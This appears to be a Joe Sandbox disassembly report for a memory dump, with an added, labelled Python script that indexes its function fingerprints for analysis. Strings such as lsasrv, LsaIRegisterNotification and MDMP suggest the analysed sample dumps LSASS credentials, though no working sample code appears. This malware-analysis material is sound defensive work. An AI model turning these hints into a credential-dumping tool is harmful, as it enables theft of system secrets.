                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                                                      • String ID:
                                                                      • API String ID: 3473179607-0
                                                                      • Opcode ID: 23fc88ee8adbd0c7eaf4c27518cee885393d252e9a1d10b55ff3b23b75bf4fba
                                                                      • Instruction ID: 569424418123f441843b337d2a6f69b9a2f08b2f1b26a55b9b9721c9bc6f2ec3
                                                                      • Opcode Fuzzy Hash: 23fc88ee8adbd0c7eaf4c27518cee885393d252e9a1d10b55ff3b23b75bf4fba
                                                                      • Instruction Fuzzy Hash: 58816D63B09783A6EB14AF14D488329A7E0EF44B74F948B35DABD422D5DF38E455E320
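
The per-function records above (Memory Dump Source, then the Similarity fields API ID, String ID, API String ID, Opcode ID and Instruction Fuzzy Hash) repeat the same layout for every function in the dump, and the report's own IDs are what make them searchable. The script below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses that flattened layout, checks that the fingerprints are internally consistent, and groups functions by the set of strings they reference (for instance, every function that only references "LocalAlloc" and "kernel32") and by API-name token (for instance, every function that reaches GetProcAddress, i.e. the dynamic API resolvers). Two assumptions are made and labelled in the code: that "API String ID" is "<hash of API ID>-<hash of String ID>", which is how it reads on every record here including the "-0" of the empty String ID, and that the first field of the .sdmp file name is the process index, which matches the "11" in "hcaresult_11_2_...". The SAMPLE text is constructed from four of the records on this page.

```python
"""Index the per-function records of a Joe Sandbox disassembly report by
their API / string fingerprints and tie them back to the memory dump.

Added example; it is not part of the Joe Sandbox report and not code from the
analysed sample. Input is the flattened text of the report's per-function
blocks ("Memory Dump Source" ... "Similarity" with "• key: value" lines).
Assumptions (not documented on the page, inferred from the records):
  * 'API String ID' is '<apihash>-<stringhash>'  (the empty String ID gives '-0')
  * the first .sdmp name field is the process index (hcaresult_11_2_... has 11)
"""
import re
from collections import defaultdict

# Constructed sample in the report's own layout, copied from four records.
SAMPLE = """
Memory Dump Source
• Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
Similarity
• API ID: AddressHandleModuleProc$FileMemoryPointerProcess$FreeLocalReadWrite
• String ID: LocalAlloc$ReadFile$WriteFile$kernel32
• API String ID: 1117553398-482538141
• Opcode ID: 7e8b7c9119c57d427c8072a0c333a4a6aaedd0a37966b110f54e2e09aaa1b727
• Instruction Fuzzy Hash: 90512A77B08A43A2EB10BF16E850579A3A1FB88BD4B94D531DA8E83B54CF3EE455D310
Memory Dump Source
• Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
Similarity
• API ID: InitStringUnicode$AddressFreeHandleLocalModuleProc
• String ID: LocalAlloc$kernel32
• API String ID: 979628613-3502785670
• Opcode ID: 0851a3e972158747da21b2bd7a9b9ad4a38fb3e2a2c883383aee178a5001d619
• Instruction Fuzzy Hash: D8025137B09B4796EB60EB15E4406AAB3E4FB84794F808531EA8D43B98EF3DE514D710
Memory Dump Source
• Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
Similarity
• API ID: AddressHandleModuleProc$FreeLocal$FilePointer$MemoryProcessWrite
• String ID: LocalAlloc$kernel32
• API String ID: 3806729184-3502785670
• Opcode ID: 715e26d59b103649faca0eeeb921ea06f3607703f71d2b78899444f4b38fef8e
• Instruction Fuzzy Hash: 7F411C37B45B07AAEB10EF60D4445A8B3B4FB44B88B848835CE4D43B59EF38E559D390
Memory Dump Source
• Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
Similarity
• API ID: _amsg_exit$CommandInitializeLine__wsetargv_cinit
• String ID:
• API String ID: 2949660345-0
• Opcode ID: 4a7d6e35ace3f62a0085c96bf3ee593ae1479313b33e2137b40653fb956c2ead
• Instruction Fuzzy Hash: 5B310C23F0C603A6FA54BBA094412B9E6D1AF90744FD0CC39DADE462D7DE2CB440B671
"""

FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z_ ]+?):\s*(?P<val>.*?)\s*$")
# Assumption: <process index>.<dump stage>.<...>.sdmp, Offset: <module base>
SOURCE_RE = re.compile(r"^(?P<pid>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\..*\.sdmp, Offset: (?P<base>[0-9A-F]+)")

def parse_records(text):
    """One dict per function record; a record starts at 'Memory Dump Source'.
    Heading lines without a bullet ('Similarity', 'Joe Sandbox IDA Plugin') are skipped."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            cur = {}
            records.append(cur)
            continue
        m = FIELD_RE.match(line)
        if m and cur is not None:
            cur[m.group("key")] = m.group("val")
    return records

def dump_origin(record):
    """(process index, dump stage, module base) parsed from the Source File line."""
    m = SOURCE_RE.match(record["Source File"])
    if not m:
        raise ValueError("unrecognised Source File: " + record["Source File"])
    return int(m.group("pid"), 16), int(m.group("stage"), 16), int(m.group("base"), 16)

def check_consistency(records):
    """Assumed split: 'API String ID' == '<apihash>-<stringhash>'. Verify that the
    same API ID / String ID text always carries the same hash across the report
    and that no two different texts collide; return both lookup tables."""
    api_hash, str_hash = {}, {}
    for r in records:
        a, s = r["API String ID"].split("-", 1)
        for table, key, val in ((api_hash, r["API ID"], a), (str_hash, r["String ID"], s)):
            if table.setdefault(key, val) != val:
                raise ValueError(f"hash conflict for {key!r}: {table[key]} vs {val}")
    for table in (api_hash, str_hash):
        if len(set(table.values())) != len(table):
            raise ValueError("two different texts share one hash")
    return api_hash, str_hash

def group_by_strings(records):
    """string-set hash -> [(API ID, Opcode ID prefix)] of the functions that use it."""
    groups = defaultdict(list)
    for r in records:
        groups[r["API String ID"].split("-", 1)[1]].append((r["API ID"], r["Opcode ID"][:8]))
    return dict(groups)

def functions_with_token(records, token):
    """Opcode ID prefixes of functions whose API ID contains token
    (e.g. 'Address' selects the GetProcAddress users, i.e. dynamic API resolvers)."""
    return [r["Opcode ID"][:8] for r in records if token in r["API ID"]]

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print("dump origin (process index, stage, module base):", dump_origin(recs[0]))
    check_consistency(recs)
    for h, funcs in group_by_strings(recs).items():
        print(h, funcs)
    print("GetProcAddress users:", functions_with_token(recs, "Address"))
```

Run it against the full report text instead of SAMPLE to get the same grouping for every function in the dump; the consistency check will raise on a truncated or mis-extracted record rather than silently indexing it, and the Opcode ID prefix is the stable handle to search for the function elsewhere in the report.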

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
Similarity
• API ID: Local$AddressAllocFreeHandleModuleProc
• String ID: LocalAlloc$kernel32
• API String ID: 3402345641-3502785670
• Opcode ID: eb57376ed0b4afeca1e5142186e1efa77bb62efc8010bcbc3caba3e012b0defc
• Instruction ID: 53bd61f4d1572fedb77ded4968ad117cbf44ca851e18c330f0aceddc964708fa
• Opcode Fuzzy Hash: eb57376ed0b4afeca1e5142186e1efa77bb62efc8010bcbc3caba3e012b0defc
• Instruction Fuzzy Hash: 66515833B14A5795EB10EF66E8400ACA3B4FB48B88B988536DE8E53B48DF3DD411D360
Control-flow Graph

APIs
• _lock.LIBCMT ref: 00007FF73CFC5A0D
  • Part of subcall function 00007FF73CFC741C: _amsg_exit.LIBCMT ref: 00007FF73CFC7446
• DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF73CFC5BD1,?,?,00000000,00007FF73CFC744B), ref: 00007FF73CFC5A40
• DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF73CFC5BD1,?,?,00000000,00007FF73CFC744B), ref: 00007FF73CFC5A5E
• DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF73CFC5BD1,?,?,00000000,00007FF73CFC744B), ref: 00007FF73CFC5A9E
• DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF73CFC5BD1,?,?,00000000,00007FF73CFC744B), ref: 00007FF73CFC5AB8
• DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF73CFC5BD1,?,?,00000000,00007FF73CFC744B), ref: 00007FF73CFC5AC8
• ExitProcess.KERNEL32 ref: 00007FF73CFC5B54
Similarity
• API ID: DecodePointer$ExitProcess_amsg_exit_lock
• String ID:
• API String ID: 3411037476-0
• Opcode ID: 2ca9a3cf637af8fc47ae09c3887ccdeb15420f15214857e012c7e6f36fb62fdc
• Instruction ID: 38734e06cb4a2c5fea82207fae3cffc7b71361bd37ddf996d993a8640b1b3ea3
• Opcode Fuzzy Hash: 2ca9a3cf637af8fc47ae09c3887ccdeb15420f15214857e012c7e6f36fb62fdc
• Instruction Fuzzy Hash: D4418233B09A43A1E644BB11EC84139E6D4FF88784F948935DACE477A5EF3CE495A720
Control-flow Graph

APIs
Similarity
• API ID: DescriptorHandleHeapSecurity$AddressAdjustAllocCloseCreateDaclFileInitializeModuleNumbersPrivilegeProcProcessSleepVersion
• String ID:
• API String ID: 366963940-0
• Opcode ID: 5f5447fcf68489846dc299bc371346d0ad4ccce6d3d7bd68e5f5ed360826dd67
• Instruction ID: 66a5400e1451b7bf3fa87226fa43655b6cf94bd8e8d62e667f08c4d457eef6d9
• Opcode Fuzzy Hash: 5f5447fcf68489846dc299bc371346d0ad4ccce6d3d7bd68e5f5ed360826dd67
• Instruction Fuzzy Hash: 35111C33A09A13B2E714AB10E8581A8B3E0FF44755FC04632D5AD466B9DF3DE549E724

APIs
Similarity
• API ID: Heap$CreateInformationVersion
• String ID:
• API String ID: 3563531100-0
• Opcode ID: 196e626f87aaeb48684bc97888c59a56b1a0abfcc28fc9b23060c14a5b268ca3
• Instruction ID: f3be11d54fee3aabe58cbb1e91de57a7bd5293f6772b1cd6d2cb215faa5ec9d1
• Opcode Fuzzy Hash: 196e626f87aaeb48684bc97888c59a56b1a0abfcc28fc9b23060c14a5b268ca3
• Instruction Fuzzy Hash: AAE06D36B19A53A2FB88B710AC09775A290FF88340FC0D934E98F02794DF3CE045A620

APIs
Strings
Similarity
• API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 2183313154-4022980321
• Opcode ID: ee30e25ceeb64b6f7566f0a35a21b345d76023c3b733a07fe50355b554bba3a2
• Instruction ID: 0a06eac0f45287bbde0e3411129a38c5ff34b2a3e5d262fd67ce5eebe8fa61bc
• Opcode Fuzzy Hash: ee30e25ceeb64b6f7566f0a35a21b345d76023c3b733a07fe50355b554bba3a2
• Instruction Fuzzy Hash: 0151D227B1C68366F724F721A4156BAE2D1BF85784FC48935EECD43A85CF3CE105A620

APIs
Similarity
• API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
• String ID:
• API String ID: 3778485334-0
• Opcode ID: bf1be38ff80d1e36a91b635a4a1ce7a4a76762dc689d6be8787abb1f1a7dd809
• Instruction ID: 009379b2e3e33e116173ace116da4374b30e269036c0ea5292ce9263ea99a3e9
• Opcode Fuzzy Hash: bf1be38ff80d1e36a91b635a4a1ce7a4a76762dc689d6be8787abb1f1a7dd809
• Instruction Fuzzy Hash: 40310737A08B47A6E750AB54F84836AB3E0FB44354F918536DACE42768DF3CE045EB20

APIs
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 5d36ba9e913c190f0612814cc419d9f76b2a0e889312af5377098d70428b273c
• Instruction ID: c7dcb387da3a35be4030fb4977bcef2732594f1210ceb89ac4702b39c13119d3
• Opcode Fuzzy Hash: 5d36ba9e913c190f0612814cc419d9f76b2a0e889312af5377098d70428b273c
• Instruction Fuzzy Hash: 91317F33B08B8296DB20EB25E8406AEB3E4FB84754F904535EADD43B95DF38D545DB10

APIs
Strings
Similarity
• API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
• API String ID: 2643518689-564504941
• Opcode ID: f00bcf87bbbb1d6e6682388d77f3276f0af41bfeee020ad42ad2caa498c19714
• Instruction ID: 437191e89eb5b078181060a5767bfdaa7712f60c18d7cb134871191d3742623f
• Opcode Fuzzy Hash: f00bcf87bbbb1d6e6682388d77f3276f0af41bfeee020ad42ad2caa498c19714
• Instruction Fuzzy Hash: E5510C27B0AB07B1FE55BB11B858574A3D0AF45F84F858935CC8E43768EE3CB489A320

APIs
Strings
Similarity
• API ID: AddressProc$HandleModule$InitStringUnicode
• String ID: Canc$LoadLibraryW$LocalAlloc$LsaI$LsaIRegisterNotification$cati$elNo$kernel32$lsasrv$tifi
• API String ID: 3738668-3948219663
• Opcode ID: 5533f267b9be45899d6176bd6bf488175ef0c89ff780fd2f82d7aa3d472244e3
• Instruction ID: 5ca36fde2f920065126726a806a78fc5920ca3faeb4a9ef5a1e279ccd5600041
• Opcode Fuzzy Hash: 5533f267b9be45899d6176bd6bf488175ef0c89ff780fd2f82d7aa3d472244e3
• Instruction Fuzzy Hash: 48912C37B09B47AAEB00EF64D8846AC73F1EB44748F808435CA4D57768DE38E55AE360

APIs
Strings
Similarity
• API ID: FreeLocal$AddressHandleModuleProcwsprintf
• String ID: %lS%lS%lS:%lS$WriteFile$kernel32
• API String ID: 602150089-2677625405
• Opcode ID: b11d8622920a2f47f9daaeab12ed3a5efb95e5e1c83adc421bcd68cf021e0860
• Instruction ID: 3450d20c7f2d54265cc6b11c9b9c552d6c26d78ccfe2c4dcad8152317a97a6a2
• Opcode Fuzzy Hash: b11d8622920a2f47f9daaeab12ed3a5efb95e5e1c83adc421bcd68cf021e0860
• Instruction Fuzzy Hash: BC519467B09A47A1EA14FB12A8442B9A3E0FF44BC4F948935DD9E47364CF3CE549E350

APIs
Strings
Similarity
• API ID: AddressHandleModuleProc$FreeLocal
• String ID: LocalAlloc$kernel32
• API String ID: 3514375268-3502785670
• Opcode ID: 16e864027eccf711ceb2599a8e25e6efffbb2f622ca0795a7aecc8477e6c70d0
• Instruction ID: 95f7dfda3d052f03be01aa0f5f5787de7bc3e2f89847eb9f119c278185851775
• Opcode Fuzzy Hash: 16e864027eccf711ceb2599a8e25e6efffbb2f622ca0795a7aecc8477e6c70d0
• Instruction Fuzzy Hash: 2C414F37B04B4395EB54AF16E844229A3E0FB88F94B94C935CE8E47354CE3EE859D310

APIs
• GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF73CFC3032), ref: 00007FF73CFC30DE
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF73CFC3032), ref: 00007FF73CFC30EE
• GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF73CFC3032), ref: 00007FF73CFC31C2
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF73CFC3032), ref: 00007FF73CFC31D2
• LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF73CFC3032), ref: 00007FF73CFC3240
• LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF73CFC3032), ref: 00007FF73CFC3249
Strings
Similarity
• API ID: AddressFreeHandleLocalModuleProc
• String ID: KSSM$LocalAlloc$RUUU$kernel32
• API String ID: 1697219777-2069434485
• Opcode ID: ff03697077344f23be60409640fc6f5bc2b2c84fe588a8c0b6027fdb40be19b8
• Instruction ID: eac679ca17629d86a6a366f49afa4cb2cc1620491af591313ece2b9b51a115c8
• Opcode Fuzzy Hash: ff03697077344f23be60409640fc6f5bc2b2c84fe588a8c0b6027fdb40be19b8
• Instruction Fuzzy Hash: 61515F33B14B63A6EB10EB61E8849A9B3B8FB44BC8B858435DE8D43754EF38D549D710

APIs
Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: File$HandleView$AddressCloseCreateMappingModuleProcUnmap
                                                                      • String ID: LocalAlloc$MDMP$kernel32
                                                                      • API String ID: 3734750734-1949004057
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73CFC6FCD), ref: 00007FF73CFC6D2A
                                                                      • malloc.LIBCMT ref: 00007FF73CFC6D93
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73CFC6FCD), ref: 00007FF73CFC6DC7
                                                                      • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73CFC6FCD), ref: 00007FF73CFC6DEE
                                                                      • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73CFC6FCD), ref: 00007FF73CFC6E36
                                                                      • malloc.LIBCMT ref: 00007FF73CFC6E93
                                                                        • Part of subcall function 00007FF73CFC8CD4: _FF_MSGBANNER.LIBCMT ref: 00007FF73CFC8D04
                                                                        • Part of subcall function 00007FF73CFC8CD4: HeapAlloc.KERNEL32(?,?,00000000,00007FF73CFC74D0,?,?,?,00007FF73CFC7395,?,?,?,00007FF73CFC743F), ref: 00007FF73CFC8D29
                                                                        • Part of subcall function 00007FF73CFC8CD4: _callnewh.LIBCMT ref: 00007FF73CFC8D42
                                                                        • Part of subcall function 00007FF73CFC8CD4: _errno.LIBCMT ref: 00007FF73CFC8D4D
                                                                        • Part of subcall function 00007FF73CFC8CD4: _errno.LIBCMT ref: 00007FF73CFC8D58
                                                                      • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73CFC6FCD), ref: 00007FF73CFC6EC8
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF73CFC6FCD), ref: 00007FF73CFC6F08
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ByteCharMultiStringWide$_errnomalloc$AllocHeap_callnewh
                                                                      • String ID:
                                                                      • API String ID: 3905601649-0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockmalloc
                                                                      • String ID:
                                                                      • API String ID: 2923989369-0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc$FreeLocal$FileMemoryPointerProcessWrite
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 3690204003-3502785670
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLocalModuleProc
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 1697219777-3502785670
                                                                      APIs
                                                                      • DecodePointer.KERNEL32(?,?,?,00007FF73CFC8725,?,?,?,?,00007FF73CFC598A,?,?,?,00007FF73CFC44D4), ref: 00007FF73CFC8639
                                                                      • DecodePointer.KERNEL32(?,?,?,00007FF73CFC8725,?,?,?,?,00007FF73CFC598A,?,?,?,00007FF73CFC44D4), ref: 00007FF73CFC8649
                                                                        • Part of subcall function 00007FF73CFC910C: _errno.LIBCMT ref: 00007FF73CFC9115
                                                                        • Part of subcall function 00007FF73CFC910C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73CFC9120
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FF73CFC8725,?,?,?,?,00007FF73CFC598A,?,?,?,00007FF73CFC44D4), ref: 00007FF73CFC86C7
                                                                        • Part of subcall function 00007FF73CFC75A4: realloc.LIBCMT ref: 00007FF73CFC75CF
                                                                        • Part of subcall function 00007FF73CFC75A4: Sleep.KERNEL32(?,?,00000000,00007FF73CFC86B7,?,?,?,00007FF73CFC8725,?,?,?,?,00007FF73CFC598A), ref: 00007FF73CFC75EB
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FF73CFC8725,?,?,?,?,00007FF73CFC598A,?,?,?,00007FF73CFC44D4), ref: 00007FF73CFC86D7
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FF73CFC8725,?,?,?,?,00007FF73CFC598A,?,?,?,00007FF73CFC44D4), ref: 00007FF73CFC86E4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                      • String ID:
                                                                      • API String ID: 1909145217-0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1445889803-0
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF73CFC57A1,?,?,?,?,00007FF73CFC42F5,?,?,?,?,00007FF73CFC365D), ref: 00007FF73CFC520A
                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF73CFC57A1,?,?,?,?,00007FF73CFC42F5,?,?,?,?,00007FF73CFC365D), ref: 00007FF73CFC5218
                                                                      • SetLastError.KERNEL32(?,?,?,00007FF73CFC57A1,?,?,?,?,00007FF73CFC42F5,?,?,?,?,00007FF73CFC365D), ref: 00007FF73CFC5270
                                                                        • Part of subcall function 00007FF73CFC7520: Sleep.KERNEL32(?,?,?,00007FF73CFC5233,?,?,?,00007FF73CFC57A1,?,?,?,?,00007FF73CFC42F5), ref: 00007FF73CFC7565
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF73CFC57A1,?,?,?,?,00007FF73CFC42F5,?,?,?,?,00007FF73CFC365D), ref: 00007FF73CFC5244
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FF73CFC5258
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ErrorLastValue_lock$CurrentSleepThread
                                                                      • String ID:
                                                                      • API String ID: 2194181773-0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _errno_getptd_invalid_parameter_noinfoiswctype
                                                                      • String ID: A$Z
                                                                      • API String ID: 3686281101-4098844585
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc$FilePointer
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 566066777-3502785670
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 1646373207-3502785670
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF73CFC585D,?,?,00000028,00007FF73CFC8D1D,?,?,00000000,00007FF73CFC74D0,?,?,?,00007FF73CFC7395), ref: 00007FF73CFC5823
                                                                      • GetProcAddress.KERNEL32(?,?,000000FF,00007FF73CFC585D,?,?,00000028,00007FF73CFC8D1D,?,?,00000000,00007FF73CFC74D0,?,?,?,00007FF73CFC7395), ref: 00007FF73CFC5838
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 1646373207-1276376045
                                                                      • Opcode ID: 2e7156098e7d4b22c2cdf77a18da4477a529ad48e7687adc2817a342e21d314d
                                                                      • Instruction ID: e0dd419a634900104d2c1c763f12e149138354ea708dc4a4280532369febe418
                                                                      • Opcode Fuzzy Hash: 2e7156098e7d4b22c2cdf77a18da4477a529ad48e7687adc2817a342e21d314d
                                                                      • Instruction Fuzzy Hash: DEE0EC12F5960361FF197B60A89853453E0BF48740B889938C89E45390DE2CB59EEA20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                                                                      • String ID:
                                                                      • API String ID: 27599310-0
                                                                      • Opcode ID: d1aff7f8dd491d9a2af4ff98f426b5defa286991a079765ade965f3974373ef1
                                                                      • Instruction ID: 1e98bb5c59dc26c41f25b1dc062310f47217a31aaf1d4b3fa61fb201166f640f
                                                                      • Opcode Fuzzy Hash: d1aff7f8dd491d9a2af4ff98f426b5defa286991a079765ade965f3974373ef1
                                                                      • Instruction Fuzzy Hash: EE516C33B0C643B6EA69AB14A44423AE7D1EB84754FE4CD35D99E02698CF7CE845A221
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$StringTypemalloc
                                                                      • String ID:
                                                                      • API String ID: 4066956681-0
                                                                      • Opcode ID: 3c67af3a7237179b16aed0a02624798f9160055e14e0f8ff9ff85d4aae7233b0
                                                                      • Instruction ID: 889de1541789edafba2aad77c564e77702b1710bcdaf964c7cb230038c586890
                                                                      • Opcode Fuzzy Hash: 3c67af3a7237179b16aed0a02624798f9160055e14e0f8ff9ff85d4aae7233b0
                                                                      • Instruction Fuzzy Hash: 5541B763B04B8396EB10AF2598001A9A3D5FF44BA8F988A32EE6D477D4DF3DE4059310
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
